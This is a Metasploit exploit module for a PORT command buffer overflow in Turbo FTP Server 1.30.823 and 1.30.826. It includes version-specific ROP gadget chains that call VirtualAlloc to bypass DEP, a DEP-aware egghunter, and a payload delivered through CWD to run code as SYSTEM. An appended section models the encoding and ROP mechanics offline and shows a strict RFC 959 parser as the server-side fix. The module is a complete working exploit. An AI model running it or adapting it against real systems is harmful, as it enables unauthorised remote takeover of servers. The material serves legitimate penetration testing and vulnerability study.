##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Turbo FTP Server 1.30.823 PORT Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in the PORT
        command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote
        code execution under the context of SYSTEM.
      },
      'Author'         =>
        [
          'Zhao Liang',     # Initial discovery
          'Lincoln',        # Metasploit
          'corelanc0d3r',   # Metasploit
          'thelightcosine'  # Metasploit
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => [ 'win' ],
      'References'     =>
        [
          [ 'OSVDB', '85887' ]
        ],
      'Payload'        =>
        {
          # The payload travels inside the egg (sent via CWD), so it must be
          # null-free; the ROP chain itself goes through PORT and is unaffected.
          'BadChars'       => "\x00",
          'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EDI'
            }
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'Windows Universal TurboFtp 1.30.823',
            {
              'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
              'ver' => 823
            }
          ],
          [ 'Windows Universal TurboFtp 1.30.826',
            {
              'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
              'ver' => 826
            }
          ],
        ],
      'DisclosureDate' => 'Oct 03 2012',
      'DefaultTarget'  => 0))
  end

  def check
    connect
    disconnect
    if (banner =~ /1\.30\.823/)
      return Exploit::CheckCode::Vulnerable
    elsif (banner =~ /1\.30\.826/)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def create_rop_chain(ver)
    # rop chain generated with mona.py - www.corelan.be
    # Both chains set up the registers for a PUSHAD # RETN that calls
    # VirtualAlloc(ESP, 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE) and returns
    # into a jmp/call esp; the VirtualAlloc pointer is left in ESI for the
    # DEP-aware egghunter.
    if ver == 823
      rop_gadgets =
      [
        0x004b692a, # POP ECX # RETN [tbssvc.exe]
        0x005f6074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]
        0x0046f82a, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]
        0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]
        0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]
        0x005d1c99, # POP EBP # RETN [tbssvc.exe]
        0x004cad5d, # & jmp esp [tbssvc.exe]
        0x004ab16b, # POP EBX # RETN [tbssvc.exe]
        0x00000001, # 0x00000001-> ebx
        0x005ef7f6, # POP EDX # RETN [tbssvc.exe]
        0x00001000, # 0x00001000-> edx
        0x005d7139, # POP ECX # RETN [tbssvc.exe]
        0x00000040, # 0x00000040-> ecx
        0x004df1e0, # POP EDI # RETN [tbssvc.exe]
        0x00411985, # RETN (ROP NOP) [tbssvc.exe]
        0x00502639, # POP EAX # RETN [tbssvc.exe]
        0x90909090, # nop
        0x00468198, # PUSHAD # RETN [tbssvc.exe]
      ].flatten.pack("V*")
    elsif ver == 826
      rop_gadgets =
      [
        0x0050eae4, # POP ECX # RETN [tbssvc.exe]
        0x005f7074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]
        0x004aa7aa, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]
        0x00496A65, # XOR EAX,EAX [tbssvc.exe]
        0x004badda, # ADD EAX,EDX # RETN [tbssvc.exe]
        0x00411867, # XCHG EAX,ESI # XOR EAX,EAX # POP EBX # RETN [tbssvc.exe]
        0x00000001, # 0x00000001-> ebx
        0x0058a27a, # POP EBP # RETN [tbssvc.exe]
        0x004df7dd, # & call esp [tbssvc.exe]
        0x005f07f6, # POP EDX # RETN [tbssvc.exe]
        0x00001000, # 0x00001000-> edx
        0x004adc08, # POP ECX # RETN [tbssvc.exe]
        0x00000040, # 0x00000040-> ecx
        0x00465fbe, # POP EDI # RETN [tbssvc.exe]
        0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
        0x00465f36, # POP EAX # RETN [tbssvc.exe]
        0x90909090, # nop
        0x004687ff, # PUSHAD # RETN [tbssvc.exe]
      ].flatten.pack("V*")
    end
    return rop_gadgets
  end

  def exploit
    my_target = target

    if my_target.name == 'Automatic'
      print_status("Automatically detecting the target")
      connect
      disconnect
      # 'Automatic' carries no Ret/ver of its own, so a concrete target is
      # chosen from the banner; an unknown banner is not attempted.
      if (banner =~ /1\.30\.823/)
        my_target = targets[1]
      elsif (banner =~ /1\.30\.826/)
        my_target = targets[2]
      else
        my_target = nil
      end
      if (not my_target)
        print_status("No matching target...quitting")
        return
      end
    end

    print_status("Selected Target: #{my_target.name}")
    connect_login

    # PORT arguments are transmitted as comma-separated decimal octets, so the
    # chain is converted byte by byte and its null bytes never hit the wire.
    rop_chain = create_rop_chain(my_target['ver'])
    rop = rop_chain.unpack('C*').join(',')

    # DEP-aware hunter: once the egg is found it calls VirtualAlloc through
    # the pointer the ROP chain leaves in ESI.
    eggoptions = {
      :checksum  => true,
      :eggtag    => 'w00t',
      :depmethod => 'virtualalloc',
      :depreg    => 'esi'
    }
    badchars = "\x00"
    hunter, egg = generate_egghunter(payload.encoded, badchars, eggoptions)

    # After the chain's VirtualAlloc call EAX holds its return value, the stack
    # page the chain handed it. Start the hunter scanning just below that
    # instead of at address 0, and move ESP away from the region being scanned
    # so the hunter's own stack traffic does not overwrite it.
    speedupasm =  "mov edx,eax\n"
    speedupasm << "sub edx,0x1000\n"
    speedupasm << "sub esp,0x1000"
    speedup = Metasm::Shellcode.assemble(Metasm::Ia32.new, speedupasm).encode_string
    fasterhunter = speedup
    fasterhunter << hunter

    print_status("Connecting to target #{my_target.name} server")

    # The egg (tag + encoded payload) is sent in a CWD so it is left in
    # memory for the hunter to find.
    buf1 = rand_text_alpha(2012)
    buf1 << egg
    buf1 << rand_text_alpha(100)

    # PORT buffer: padding, EIP, ROP chain, speedup + egghunter, filler
    buf2 = rand_text_alpha(4).unpack('C*').join(',')
    buf2 << ","
    buf2 << [my_target['Ret']].pack("V").unpack('C*').join(',') # eip
    buf2 << ","
    buf2 << rop
    buf2 << ","
    buf2 << fasterhunter.unpack('C*').join(',')
    buf2 << ","
    buf2 << rand_text_alpha(90).unpack('C*').join(',')

    send_cmd(['CWD', buf1], true)
    send_cmd(['PORT', buf2], true)

    print_status("Egghunter deployed, locating shellcode")
    handler
    disconnect
  end
end
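The two mechanisms the module above depends on, modelled offline as an added Ruby example that is not part of the module or of the Metasploit Framework: first, the PORT delivery channel, where each byte is sent as a decimal number so the chain's null bytes never appear on the wire while the CWD-delivered egg must stay null-free, shown next to an RFC 959-shaped strict parser that rejects the oversized argument; second, what the PUSHAD # RETN gadget turns the register state of the 1.30.823 chain into, i.e. the VirtualAlloc call and the place jmp esp lands afterwards. The permissive and strict PORT parsers are models of server-side behaviour, not Turbo FTP's code, and the stack pointer and resolved VirtualAlloc address are constructed placeholders.

```ruby
# --- 1. The PORT delivery channel -------------------------------------------
# buf2 is sent as one decimal number per byte, comma separated.
def port_encode(bytes)
  bytes.unpack('C*').join(',')
end

# Model of a permissive server-side parse (not Turbo FTP's code): every field is
# converted and stored as one byte with no limit on the field count, which is
# what lets an oversized PORT argument overrun a fixed six-byte buffer.
def port_decode(arg)
  arg.split(',').map { |f| Integer(f, 10) & 0xff }.pack('C*')
end

# Hardened parse (RFC 959 shape): exactly six fields, each 0..255; anything else
# is rejected instead of copied. Returns [host, port] or nil.
def parse_port_strict(arg)
  fields = arg.split(',', -1)
  return nil unless fields.length == 6
  return nil unless fields.all? { |f| f =~ /\A\d{1,3}\z/ && f.to_i <= 255 }
  host = fields[0, 4].join('.')
  [host, fields[4].to_i * 256 + fields[5].to_i]
end

# Would this buffer survive the CWD channel (no byte from the BadChars set)?
def cwd_safe?(bytes, badchars = "\x00")
  bad = badchars.bytes
  bytes.each_byte.none? { |b| bad.include?(b) }
end

# --- 2. What PUSHAD # RETN does with the registers ----------------------------
# Register state the 1.30.823 chain leaves immediately before PUSHAD.
# esp and virtualalloc are constructed placeholder values.
def rop_registers_823(esp: 0x0012f3c0, virtualalloc: 0x7c809af1)
  {
    eax: 0x90909090,   # POP EAX: nop sled, the slot ESP points at after the call
    ecx: 0x00000040,   # POP ECX: flProtect = PAGE_EXECUTE_READWRITE
    edx: 0x00001000,   # POP EDX: flAllocationType = MEM_COMMIT
    ebx: 0x00000001,   # POP EBX: dwSize = 1 (rounded up to a page)
    esp: esp,          # constructed: stack pointer at PUSHAD time, becomes lpAddress
    ebp: 0x004cad5d,   # POP EBP: & jmp esp, VirtualAlloc's return address
    esi: virtualalloc, # constructed: read from the IAT slot by MOV EDX,[ECX] and the XCHGs
    edi: 0x00411985    # POP EDI: RETN, a ROP NOP
  }
end

# PUSHAD pushes EAX, ECX, EDX, EBX, the pre-push ESP, EBP, ESI, EDI in that
# order, so read from the top of the stack EDI comes first.
def pushad_stack(regs)
  [:edi, :esi, :ebp, :esp, :ebx, :edx, :ecx, :eax].map { |r| regs[r] }
end

# Follow the RETNs: the ROP NOP in EDI returns into ESI (VirtualAlloc), which
# sees EBP as its return address and ESP/EBX/EDX/ECX as its four arguments.
# stdcall pops those four, so the jmp esp in EBP lands on what is left.
def virtualalloc_call(regs)
  stack = pushad_stack(regs)
  rop_nop = stack.shift
  callee  = stack.shift
  ret_to, lp_address, dw_size, fl_alloc, fl_protect = stack.shift(5)
  {
    rop_nop: rop_nop, callee: callee, return_to: ret_to,
    lpAddress: lp_address, dwSize: dw_size,
    flAllocationType: fl_alloc, flProtect: fl_protect,
    left_on_stack: stack
  }
end

if __FILE__ == $0
  chain = [0x00411985, 0x00000001].pack('V*')   # two dwords from the 823 chain
  puts "null-free for CWD? #{cwd_safe?(chain)}"
  puts "PORT form:         #{port_encode(chain)}"
  puts "strict parse:      #{parse_port_strict(port_encode(chain)).inspect}"
  p virtualalloc_call(rop_registers_823)
end
```

The strict parser is the shape of the fix a server needs: bound the field count and range before anything is written, rather than copying whatever atoi() produces into a fixed buffer.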